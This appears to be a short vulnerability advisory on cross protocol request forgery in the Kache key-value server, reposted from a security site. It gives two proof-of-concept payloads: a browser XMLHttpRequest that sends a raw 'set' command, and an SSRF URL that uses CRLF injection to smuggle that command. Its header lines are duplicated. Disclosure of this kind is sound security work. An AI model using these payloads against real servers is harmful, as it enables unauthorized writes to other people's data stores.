# Title: Kache / CPRF
# Date: 03/01/2019
# Discovered by: @codexlynx
# Software Version: <= Commit: de2c39491625c3f087027be961a17191e85f6d30 (For now they don't version)< # Title: Kache / CPRF
# Date: 03/01/2019
# Discovered by: @codexlynx
# Software Version: <= Commit: de2c39491625c3f087027be961a17191e85f6d30 (For now they don't version)
# Category: go, resp, cprf
[1]CPRF (Cross Protocol Request Forgery)
--------------------------------
Kache server don't close connection when unknown strings are received. This can allow to a malicious actor to perform cross protocol interactions.
- POC 1: Set a key by HTTP:
<script>
var x = new XMLHttpRequest();
x.open("POST", "http://<TARGET_ADDRESS>:<TARGET_PORT>");
x.send("set mykey myvalue
");
</script>
- POC 2: Exploit this CPRF for set a key via SSRF + CRLF Injection:
https://<VULNERABLE_TARGET>/ssrf.php?url_to_post=http://<KACHE_ADDRESS>:<KACHE_PORT>/%0D%0Aset%20mykey%20myvalue
Kache Cross Protocol Request Forgery
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 271